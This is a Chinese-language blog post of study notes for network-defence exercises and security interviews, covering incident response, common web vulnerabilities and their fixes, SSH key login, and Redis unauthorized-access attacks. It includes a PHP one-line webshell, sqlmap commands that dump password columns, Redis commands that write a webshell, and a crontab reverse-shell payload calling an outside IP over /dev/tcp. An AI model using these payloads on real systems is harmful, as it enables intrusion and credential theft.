<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="护网学习资料"><meta name="keywords" content=""><meta name="author" content="George"><meta name="copyright" content="George"><title>护网学习资料 | A.</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#03-12培训笔记"><span class="toc-number">1.</span> <span class="toc-text">03.12培训笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#护网行动三个阶段"><span class="toc-number">1.1.</span> <span class="toc-text">护网行动三个阶段</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#应急响应做些什么"><span class="toc-number">1.2.</span> <span class="toc-text">应急响应做些什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常用的安全工具？扫描端口工具？"><span class="toc-number">1.3.</span> <span class="toc-text">常用的安全工具？扫描端口工具？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sftp，telnet，ssh端口？"><span class="toc-number">1.4.</span> <span class="toc-text">sftp，telnet，ssh端口？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#操作过什么防火墙设备？常见的防火墙厂家哪些？"><span class="toc-number">1.5.</span> <span class="toc-text">操作过什么防火墙设备？常见的防火墙厂家哪些？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#对网络协议了解多少？"><span class="toc-number">1.6.</span> <span class="toc-text">对网络协议了解多少？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#做过什么产品（岗位）？有没有做过数据库相关工作？"><span class="toc-number">1.7.</span> <span class="toc-text">做过什么产品（岗位）？有没有做过数据库相关工作？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#渗透测试"><span class="toc-number">1.8.</span> <span class="toc-text">渗透测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sql注入的原理及防护？"><span class="toc-number">1.9.</span> <span class="toc-text">sql注入的原理及防护？</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sqlmap："><span class="toc-number">1.9.1.</span> <span class="toc-text">sqlmap：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS攻击和防护"><span class="toc-number">1.10.</span> <span class="toc-text">XSS攻击和防护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP一句话木马怎么写？"><span class="toc-number">1.11.</span> <span class="toc-text">PHP一句话木马怎么写？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反序列化漏洞成因"><span class="toc-number">1.12.</span> <span class="toc-text">反序列化漏洞成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JBossMQ-JMS反序列化漏洞（CVE-2017-7504）怎么发现的？"><span class="toc-number">1.13.</span> <span class="toc-text">JBossMQ JMS反序列化漏洞（CVE-2017-7504）怎么发现的？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF成因及原理"><span class="toc-number">1.14.</span> <span class="toc-text">CSRF成因及原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF成因及原理"><span class="toc-number">1.15.</span> <span class="toc-text">SSRF成因及原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞类型"><span class="toc-number">1.16.</span> <span class="toc-text">漏洞类型</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#护网常见设备"><span class="toc-number">1.17.</span> <span class="toc-text">护网常见设备</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#加固方案"><span class="toc-number">1.18.</span> <span class="toc-text">加固方案</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#03-18培训笔记"><span class="toc-number">2.</span> <span class="toc-text">03.18培训笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#redis（端口6379）"><span class="toc-number">2.1.</span> <span class="toc-text">redis（端口6379）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh免密登录"><span class="toc-number">2.2.</span> <span class="toc-text">ssh免密登录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ssh登录原理："><span class="toc-number">2.2.1.</span> <span class="toc-text">ssh登录原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#本机测试："><span class="toc-number">2.2.2.</span> <span class="toc-text">本机测试：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-known-hosts中存储的内容是什么？"><span class="toc-number">2.2.2.0.1.</span> <span class="toc-text">1. known_hosts中存储的内容是什么？</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-host-key何时加入known-hosts的？"><span class="toc-number">2.2.2.0.2.</span> <span class="toc-text">2. host key何时加入known_hosts的？</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-为什么需要known-hosts？"><span class="toc-number">2.2.2.0.3.</span> <span class="toc-text">3. 为什么需要known_hosts？</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#应急响应排查思路"><span class="toc-number">2.3.</span> <span class="toc-text">应急响应排查思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCP"><span class="toc-number">2.4.</span> <span class="toc-text">TCP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#03-19培训笔记"><span class="toc-number">3.</span> <span class="toc-text">03.19培训笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#三种对redis免密登录的攻击手段"><span class="toc-number">3.1.</span> <span class="toc-text">三种对redis免密登录的攻击手段</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#日常"><span class="toc-number">4.</span> <span class="toc-text">日常</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#03-14"><span class="toc-number">4.1.</span> <span class="toc-text">03.14</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">George</div><div class="author-info__description text-center">Here recording my growth of technology and hope you can gain something here.</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">99</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">18</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">19</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">A.</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">护网学习资料</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-02-09</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>查询id为0的用户名称</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk -F: &#39;$3&#x3D;&#x3D;0&#123;print $1&#125;&#39; &#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>



<p>查询空密码用户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk -F: &#39;length($2)&#x3D;&#x3D;0 &#123;print $1&#125;&#39; &#x2F;etc&#x2F;shadow</span><br></pre></td></tr></table></figure>





<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -ef</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls &#x2F;proc</span><br></pre></td></tr></table></figure>













<h1 id="03-12培训笔记"><a href="#03-12培训笔记" class="headerlink" title="03.12培训笔记"></a>03.12培训笔记</h1><h2 id="护网行动三个阶段"><a href="#护网行动三个阶段" class="headerlink" title="护网行动三个阶段"></a>护网行动三个阶段</h2><ol>
<li>备战阶段：哪些工作？1-减少攻击面 2-排查风险点减小攻击面就是缩小暴露面。对公司资产进行梳理，然后对资产进行：<br>1、关闭不在用的业务系统；<br>2、关闭重要系统外网访问通道，通过VPN进行业务操作。<br>排查风险点，是对公司资产进行漏洞扫描、渗透测试、弱口令扫描，基线检查发<br>现存在的风险问题。然后对风险问题进行加固整改及风险问题复测。</li>
<li>临战阶段：进行内部攻防演练，发现备战忽略的风险。（具体操作）<br>对原本已有的一些安全设备进行策略优化，同时也新增了一些安全设备</li>
<li>决战阶段：7*24小时，要说做过护网。利用监测手段做好对自有系统安全事件监测与<br>防御，发现攻击事件立即上报并做好应急处置。持续优化防护手段，持续对安全<br>风险进行加固整改。</li>
<li>总结阶段（演习结果通报至通报后两周）<br>安全加固小组进行防护总结。<br>安全监控小组监控总结。</li>
</ol>
<h2 id="应急响应做些什么"><a href="#应急响应做些什么" class="headerlink" title="应急响应做些什么"></a>应急响应做些什么</h2><p>分为五个部分：</p>
<ol>
<li>收集信息：收集客户信息和中毒主机信息，包括样本。</li>
<li>判断类型：判断是否是安全事件，何种安全事件，勒索、挖矿、断网、DoS等<br>等。</li>
<li>深入分析：日志分析、进程分析、启动项分析、样本分析。</li>
<li>清理处置：直接杀掉进程，删除文件，打补丁，抑或是修复文件。</li>
<li>产出报告：整理并输出完整的安全事件报告。</li>
</ol>
<h2 id="常用的安全工具？扫描端口工具？"><a href="#常用的安全工具？扫描端口工具？" class="headerlink" title="常用的安全工具？扫描端口工具？"></a>常用的安全工具？扫描端口工具？</h2><p>端口及漏洞扫描：nmap，nessus</p>
<p>数据抓包：wireshark，burpsuite</p>
<p>应用安全测试：burpsuite</p>
<p>web自动化安全扫描：awvs，appscan</p>
<h2 id="sftp，telnet，ssh端口？"><a href="#sftp，telnet，ssh端口？" class="headerlink" title="sftp，telnet，ssh端口？"></a>sftp，telnet，ssh端口？</h2><p>sftp：22、telnet：23、ssh：22</p>
<p>SSH和telnet区别：SSH加密传输，telnet明文纯属数据</p>
<h2 id="操作过什么防火墙设备？常见的防火墙厂家哪些？"><a href="#操作过什么防火墙设备？常见的防火墙厂家哪些？" class="headerlink" title="操作过什么防火墙设备？常见的防火墙厂家哪些？"></a>操作过什么防火墙设备？常见的防火墙厂家哪些？</h2><p><strong>实话实说</strong></p>
<p>操作过<strong>主机防火墙</strong>，阿里云和腾讯云WAF，长亭WAF，阿里云防火墙。</p>
<p>厂家：深信服、山石网科、绿盟、长亭</p>
<h2 id="对网络协议了解多少？"><a href="#对网络协议了解多少？" class="headerlink" title="对网络协议了解多少？"></a>对网络协议了解多少？</h2><p>网络协议是为计算机网络中进行交换而建立的规则、标准或约定集合。</p>
<p>常见：HTTP、FTP、TELNET</p>
<p>物理层：以太网·调制解调器·电力线通信<br>(PLC)·SONET/SDH·G.709·光导纤维·同轴电缆·双绞线等</p>
<p>数据链路层：Wi-Fi(IEEE802.11)·WiMAX(IEEE<br>802.16)·ATM·DTM·令牌环·以太网·FDDI·帧中<br>继·GPRS·EVDO·HSPA·HDLC·PPP·L2TP·PPTP·ISDN·STP·<br>CSMA/CD等</p>
<p>网络层协议：IP<br>(IPv4·IPv6)·ICMP·ICMPv6·IGMP·IS-IS·IPsec·ARP·RARP<br>·RIP等</p>
<p>传输层协议：TCP·UDP·TLS·DCCP·SCTP·RSVP·OSPF等</p>
<p>应用层协议：<br>DHCP·DNS·FTP·Gopher·HTTP·IMAP4·IRC·NNTP·XMPP<br>·POP3·SIP·SMTP·SNMP·SSH·TELNET·RPC·RTCP·RTP·RTSP·<br>SDP·SOAP·GTP·STUN·NTP·SSDP·BGP等</p>
<h2 id="做过什么产品（岗位）？有没有做过数据库相关工作？"><a href="#做过什么产品（岗位）？有没有做过数据库相关工作？" class="headerlink" title="做过什么产品（岗位）？有没有做过数据库相关工作？"></a>做过什么产品（岗位）？有没有做过数据库相关工作？</h2><p><strong>实话实说</strong></p>
<p>岗位：</p>
<h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><p>渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种<br>评估方法。以利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在<br>的漏洞，然后输出渗透测试报告，并提交给网络所有者。网络所有者根据渗透人员<br>提供的渗透测试报告，可以清晰知晓系统中存在的安全隐患和问题。</p>
<h2 id="sql注入的原理及防护？"><a href="#sql注入的原理及防护？" class="headerlink" title="sql注入的原理及防护？"></a>sql注入的原理及防护？</h2><p>原理：用户将恶意的SQL语句插入到应用的输入参数中，后台SQL服务<br>器解析执行恶意SQL语句，形成SQL注入攻击。</p>
<p>类型：报错型，时间型，盲注</p>
<p>防护:</p>
<ol>
<li>过滤用户输入的恶意字符</li>
<li>使用预编译：提前将sql语句发给数据库进行预编译，无论输入什么都会正常执行，不会影响原来的逻辑。</li>
</ol>
<p>sql手工注入：</p>
<h3 id="sqlmap："><a href="#sqlmap：" class="headerlink" title="sqlmap："></a>sqlmap：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u 网址 --dbs</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u 网址 -D security --tables</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u 网址 -D security -T users --columns</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u 网址 -D security -T users -C id,password,username --dump</span><br></pre></td></tr></table></figure>



<h2 id="XSS攻击和防护"><a href="#XSS攻击和防护" class="headerlink" title="XSS攻击和防护"></a>XSS攻击和防护</h2><p>原理：浏览器执行用户输入的JS代码</p>
<p>防护：</p>
<ol>
<li>服务端过滤用户输入的危险字符【过滤script，href】</li>
<li>对输出内容进行HTML实体编码【htmlspecialchar】</li>
</ol>
<h2 id="PHP一句话木马怎么写？"><a href="#PHP一句话木马怎么写？" class="headerlink" title="PHP一句话木马怎么写？"></a>PHP一句话木马怎么写？</h2><p><code>&lt;?php @eval($_POST[&#39;ag&#39;]); ?&gt;</code></p>
<p>eval函数将接收到的字符串当代码执行。</p>
<h2 id="反序列化漏洞成因"><a href="#反序列化漏洞成因" class="headerlink" title="反序列化漏洞成因"></a>反序列化漏洞成因</h2><p><strong>序列化：</strong>将对象转化为便于传输的格式， 常见的序列化格式：二进制格式，字节数组，json字符串，xml字符串。</p>
<p><strong>反序列化：</strong>将序列化的数据恢复为对象的过程。</p>
<p><strong>反序列化漏洞成因：</strong><br>当输入的反序列化的数据可被用户控制，那么攻击者即可通过构造恶意输入，让反<br>序列化产生非预期的对象，在此过程中执行构造的任意代码。</p>
<h2 id="JBossMQ-JMS反序列化漏洞（CVE-2017-7504）怎么发现的？"><a href="#JBossMQ-JMS反序列化漏洞（CVE-2017-7504）怎么发现的？" class="headerlink" title="JBossMQ JMS反序列化漏洞（CVE-2017-7504）怎么发现的？"></a>JBossMQ JMS反序列化漏洞（CVE-2017-7504）怎么发现的？</h2><p>JavaDeserH2HC工具利用该漏洞？</p>
<h2 id="CSRF成因及原理"><a href="#CSRF成因及原理" class="headerlink" title="CSRF成因及原理"></a>CSRF成因及原理</h2><p><strong>成因：</strong>CSRF漏洞的成因就是<strong>网站的cookie在浏览器中不会过期</strong>，只要不关闭浏览器或者退出登录，那之后只要是访问这个网站，都会默认你已经登录的状态。而在这个期间，攻击者发送构造好的CSRF脚本或包含CSRF脚本的链接，可能会执行一些用户不想做的功能。</p>
<p><strong>防护：</strong></p>
<ol>
<li>验证referer</li>
<li>加token</li>
</ol>
<h2 id="SSRF成因及原理"><a href="#SSRF成因及原理" class="headerlink" title="SSRF成因及原理"></a>SSRF成因及原理</h2><p><strong>成因：</strong>服务器提供了从其他服务器应用获取数据的功能，并且对目标地址没有做严格的过滤！</p>
<p><strong>防护：</strong></p>
<ol start="2">
<li>设置url白名单，限制访问的IP地址【内网】</li>
<li>限制访问的端口</li>
<li>设置统一的错误处理页面，防止信息泄漏！</li>
</ol>
<h2 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h2><p>sql注入、xss、反序列化、文件上传、文件包含、CSRF、SSRF</p>
<h2 id="护网常见设备"><a href="#护网常见设备" class="headerlink" title="护网常见设备"></a>护网常见设备</h2><p>WAF、态势感知、IPS、云防、数据库审计</p>
<h2 id="加固方案"><a href="#加固方案" class="headerlink" title="加固方案"></a>加固方案</h2><h1 id="03-18培训笔记"><a href="#03-18培训笔记" class="headerlink" title="03.18培训笔记"></a>03.18培训笔记</h1><h2 id="redis（端口6379）"><a href="#redis（端口6379）" class="headerlink" title="redis（端口6379）"></a>redis（端口6379）</h2><p>作用</p>
<ol>
<li>实现缓存功能</li>
<li>进行键值对存储</li>
<li>构建集群化服务、redis哨兵</li>
</ol>
<p>redis未授权条件：</p>
<p>绑定了IP：0.0.0.0，且redis没有开启密码认证功能</p>
<p>登录：0.0.0.0:6379  -&gt; config执行对文件的写操作，将自己的ssh的公钥写入到目标的服务器中</p>
<p>修复：</p>
<ol>
<li>redis开启密码认证，绑定127.0.0.1</li>
<li>使用防火墙</li>
</ol>
<h2 id="ssh免密登录"><a href="#ssh免密登录" class="headerlink" title="ssh免密登录"></a>ssh免密登录</h2><h3 id="ssh登录原理："><a href="#ssh登录原理：" class="headerlink" title="ssh登录原理："></a>ssh登录原理：</h3><ol>
<li>Client将自己的公钥存放在Server上，追加在文件authorized_keys中。</li>
<li>Server端接收到Client的连接请求后，会在authorized_keys中匹配到Client的公钥pubKey，并生成随机数R，用Client的公钥对该随机数进行加密得到pubKey(R)，然后将加密后信息发送给Client。</li>
<li>Client端通过私钥进行解密得到随机数R，然后对随机数R和本次会话的SessionKey利用MD5生成摘要Digest1，发送给Server端。</li>
<li>Server端会也会对R和SessionKey利用同样摘要算法生成Digest2。</li>
<li>Server端会最后比较Digest1和Digest2是否相同，完成认证过程。</li>
</ol>
<h3 id="本机测试："><a href="#本机测试：" class="headerlink" title="本机测试："></a>本机测试：</h3><p>测试机：</p>
<ol>
<li>kali2021：192.168.33.128</li>
<li>owaspbwa：192.168.33.132</li>
</ol>
<p>测试流程：</p>
<p>先拿kali2021尝试传文件给owa：</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-2.png" alt="1-2"></p>
<p>发现需要输入密码，同时发现本地.ssh里多了个known_hosts</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-3.png" alt="1-3"></p>
<blockquote>
<h5 id="1-known-hosts中存储的内容是什么？"><a href="#1-known-hosts中存储的内容是什么？" class="headerlink" title="1. known_hosts中存储的内容是什么？"></a>1. known_hosts中存储的内容是什么？</h5><p>known_hosts中存储是已认证的远程主机host key，每个SSH Server都有一个<strong>secret, unique ID, called a host key</strong>。</p>
<h5 id="2-host-key何时加入known-hosts的？"><a href="#2-host-key何时加入known-hosts的？" class="headerlink" title="2. host key何时加入known_hosts的？"></a>2. host key何时加入known_hosts的？</h5><p>当我们第一次通过SSH登录远程主机的时候，Client端会有如下提示：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Host key not found <span class="keyword">from</span> the list of known hosts.</span><br><span class="line"><span class="function">Are you sure you want to <span class="keyword">continue</span> <span class="title">connecting</span> (<span class="params">yes/no</span>)?</span></span><br></pre></td></tr></table></figure>

<p>此时，如果我们选择<strong>yes</strong>，那么该host key就会被加入到Client的known_hosts中，格式如下：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># <span class="selector-tag">domain</span> <span class="selector-tag">name</span>+<span class="selector-tag">encryption</span> <span class="selector-tag">algorithm</span>+<span class="selector-tag">host</span> <span class="selector-tag">key</span></span><br><span class="line"><span class="selector-tag">example</span><span class="selector-class">.hostname</span><span class="selector-class">.com</span> <span class="selector-tag">ssh-rsa</span> <span class="selector-tag">AAAAB4NzaC1yc2EAAAABIwAAAQEA</span>。。。</span><br></pre></td></tr></table></figure>

<h5 id="3-为什么需要known-hosts？"><a href="#3-为什么需要known-hosts？" class="headerlink" title="3. 为什么需要known_hosts？"></a>3. 为什么需要known_hosts？</h5><p>最后探讨下为什么需要known_hosts，这个文件主要是通过Client和Server的双向认证，从而避免中间人（<strong>man-in-the-middle attack</strong>）攻击，每次Client向Server发起连接的时候，不仅仅Server要验证Client的合法性，Client同样也需要验证Server的身份，SSH client就是通过known_hosts中的host key来验证Server的身份的。</p>
</blockquote>
<p>我们利用ssh-keygen在kali上生成公私钥：</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-4.png" alt="1-4"></p>
<p>我们把公钥给owaspbwa：</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-5.png" alt="1-5"></p>
<p>发现owa上多了：</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-6.png" alt="1-6"></p>
<p>此时我们再次传文件，发现以及不需要密码：</p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-7.png" alt="1-7"></p>
<p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/1-8.png" alt="1-8"></p>
<h2 id="应急响应排查思路"><a href="#应急响应排查思路" class="headerlink" title="应急响应排查思路"></a>应急响应排查思路</h2><ol>
<li>检查服务器<strong>账号</strong>安全（更换密码的频率以及处理不常用用户账号）</li>
<li>检查异常<strong>进程和端口</strong></li>
<li>检查系统的<strong>启动项</strong>和计划任务</li>
<li>检查系统的基础信息</li>
<li>系统版本和补丁情况</li>
<li>常见的可疑目录</li>
<li>本地查杀</li>
<li>结合流量进行分析</li>
</ol>
<h2 id="TCP"><a href="#TCP" class="headerlink" title="TCP"></a>TCP</h2><p><img src="/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/D:%5Cgitblog%5C1%5Csource_posts%5C%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99%5C1-1.png" alt="1-1"></p>
<h1 id="03-19培训笔记"><a href="#03-19培训笔记" class="headerlink" title="03.19培训笔记"></a>03.19培训笔记</h1><h2 id="三种对redis免密登录的攻击手段"><a href="#三种对redis免密登录的攻击手段" class="headerlink" title="三种对redis免密登录的攻击手段"></a>三种对redis免密登录的攻击手段</h2><p>1：利用redis无登录密码和web下具有写权限，实现webshell获取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;var&#x2F;www&#x2F;html		&#x2F;&#x2F;为redis读取缓存数据定义目录</span><br><span class="line">config get dir</span><br><span class="line">config set dbfilename 1.php			&#x2F;&#x2F;为redis设置数据库缓存的存储文件</span><br><span class="line">set aaa &quot;&lt;?php phpinfo(); ?&gt;&quot;		&#x2F;&#x2F;将存储数据文件中写入变量值</span><br></pre></td></tr></table></figure>



<p>2：利用crontab系统排程实现shell反弹</p>
<p>原理：利用redis的未授权访问的漏洞，给与redis-server一个可执行的crontab计划排程，在本端开启监听任意端口可以可以捕捉到shell反弹</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">crontab -l			&#x2F;&#x2F;查看排程</span><br><span class="line">crontab -e			&#x2F;&#x2F;编辑排程	</span><br><span class="line">里面编辑：</span><br><span class="line">*&#x2F;1 * * * 5 &#x2F;bin&#x2F;bash &#x2F;root&#x2F;1.sh			&#x2F;&#x2F;具体含义见crontab -h</span><br><span class="line"></span><br><span class="line">set ccc【任意变量】 &quot;\n\n*&#x2F;1 * * * * &#x2F;bin&#x2F;bash -i&gt;&amp;&#x2F;dev&#x2F;tcp&#x2F;192.168.77.128&#x2F;6666【6666端口】 0&gt;&amp;1\n\n&quot;</span><br></pre></td></tr></table></figure>



<p>3：通过redis未授权，给服务器传输公钥，在本端使用私钥进行远程登录</p>
<blockquote>
<p>zsh和bash的区别</p>
</blockquote>
<h1 id="日常"><a href="#日常" class="headerlink" title="日常"></a>日常</h1><h2 id="03-14"><a href="#03-14" class="headerlink" title="03.14"></a>03.14</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">grant select,update&#x2F;all privileges on db.table to &#39;user&#39;@&#39;ip&#39; identified by &#39;passwd&#39;;</span><br><span class="line">flush grant</span><br><span class="line">&#x2F;&#x2F;给用户授权并更新</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># &#x2F;etc&#x2F;init.d&#x2F;apache2 restart			&#x2F;&#x2F;kali 重启apache</span><br><span class="line"># systemctl restart httpd				&#x2F;&#x2F;red hat重启</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">看日志：</span><br><span class="line">&#x2F;var&#x2F;log</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ss -tanlp			&#x2F;&#x2F;查看端口</span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">George</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/">http://yoursite.com/2021/02/09/%E6%8A%A4%E7%BD%91%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><div class="addthis_inline_share_toolbox pull-right"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=undefined" async></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/03/02/%E5%88%98%E8%B6%85%E7%9A%84%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/"><i class="fa fa-chevron-left">  </i><span>刘超的网络协议</span></a></div><div class="next-post pull-right"><a href="/2021/02/08/xss-labs/"><span>xss-labs</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By George</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span 